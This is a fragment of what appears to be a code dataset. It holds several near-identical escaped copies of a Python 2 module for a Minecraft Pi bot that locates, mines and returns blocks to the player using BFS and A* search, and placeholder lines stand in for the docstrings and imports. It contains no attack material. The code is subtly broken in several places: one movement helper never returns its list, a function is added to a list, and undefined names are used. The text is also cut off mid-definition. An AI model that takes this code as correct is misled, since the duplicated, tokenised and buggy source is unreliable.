Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def 